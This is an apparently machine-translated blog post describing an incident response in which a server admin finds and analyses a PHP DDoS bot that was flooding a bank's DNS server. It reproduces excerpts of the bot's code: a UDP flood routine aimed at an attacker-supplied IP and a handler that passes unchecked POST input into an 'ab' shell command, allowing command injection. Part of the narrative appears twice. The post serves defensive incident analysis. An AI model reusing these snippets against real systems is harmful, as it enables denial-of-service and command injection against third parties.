DDoS-bot in PHP walks through the servers
Today, at about two o'clock in the morning, when I wanted to go to bed, one of my acquaintances wrote to me on Skype. Last year, I helped him administer several of his servers. At such a late time, he wrote that the network interface of one of his servers was completely clogged, judging by the mrtg schedule. I looked, really, I could not even get through to ssh, the server was rebooted and the situation analysis began ...
After rebooting the server, after some time, the traffic appeared again. I launched iptraf, it showed quite a large number of UDP packets to a single IP address - " 171.161.224.16 ", when I otrezolvil it in dns5.bankofamerica.com : everything fell into place, apparently from the server DDoS.
Banned IP in iptables. I looked at the top, one of the httpd processes consumed 100% cpu, set strace on it, I saw the same familiar address. Since there is no access_log on the server, and the error_log was empty, I turned to the logs of the excellent php module baxtep ( article on Habré ), which writes to the log all attempts to execute any command via the php interpreter. I made RPMku and always put it on the server servers, just in such a case. I with the naked eye determined the name of the required script:
')
The code of the file is available by reference , I found it in Google by the itsoknoproblembro line from the file, in Google there is only one result, I thought freshly and decided to write about it to Habr.
The file size is only 3kb, the code is not complicated. The main features of the bot:
I will dwell in more detail on ddose.
The script receives the address of the attacked target through a parameter, opens a UDP socket, and as long as the socket exists, it sends requests to the 11th port. Moreover, it is interesting that in the data he sends his address.
The question “Why?” Has not left my head for 12 hours.
The second attack method is through the ab utility:
Moreover, there are no checks for incoming parameters and you can execute arbitrary commands on the server.
Earlier, I personally did not encounter UDP-ddos on php, did not flood us with this, googled it - apparently people have been practicing for a long time under different sauces.
Analysis of the situation
After rebooting the server, after some time, the traffic appeared again. I launched iptraf, it showed quite a large number of UDP packets to a single IP address - " 171.161.224.16 ", when I otrezolvil it in dns5.bankofamerica.com : everything fell into place, apparently from the server DDoS.
Banned IP in iptables. I looked at the top, one of the httpd processes consumed 100% cpu, set strace on it, I saw the same familiar address. Since there is no access_log on the server, and the error_log was empty, I turned to the logs of the excellent php module baxtep ( article on Habré ), which writes to the log all attempts to execute any command via the php interpreter. I made RPMku and always put it on the server servers, just in such a case. I with the naked eye determined the name of the required script:
')
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-bin` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-cgi` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
The code of the file is available by reference , I found it in Google by the itsoknoproblembro line from the file, in Google there is only one result, I thought freshly and decided to write about it to Habr.
Code analysis
The file size is only 3kb, the code is not complicated. The main features of the bot:
- uploading files to the server
- DDoS large number of UDP packets
- ddos through the ab utility
I will dwell in more detail on ddose.
case "ust": $page = curPageURL(); $ip = $_POST['ip']; $port = "11"; $out = $page."\n"; $socket = stream_socket_client("udp://$ip:$port"); if ($socket) { stream_set_write_buffer($socket, 0); stream_socket_sendto($socket,$out); } fclose($socket); break; The script receives the address of the attacked target through a parameter, opens a UDP socket, and as long as the socket exists, it sends requests to the 11th port. Moreover, it is interesting that in the data he sends his address.
function curPageURL(){ $pageURL = 'http'; if ($_SERVER["HTTPS"] == "on") { $pageURL .= "s"; } $pageURL .= "://"; if ($_SERVER["SERVER_PORT"] != "80") { $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]; } else { $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; } return $pageURL; } The question “Why?” Has not left my head for 12 hours.
The second attack method is through the ab utility:
case "ab": $url = $_POST['url']; $c = $_POST['c']; $n = $_POST['n']; cmdexec("ab -c $c -n $n $url"); break; Moreover, there are no checks for incoming parameters and you can execute arbitrary commands on the server.
Earlier, I personally did not encounter UDP-ddos on php, did not flood us with this, googled it - apparently people have been practicing for a long time under different sauces.
findings
- As practice has shown, such a script easily clogs the entire available channel.
- The situation became a reality, as UDP was not paranoidly filtered on the server.
- Someone decided to put BOA :)
Source: https://habr.com/ru/post/136166/
All Articles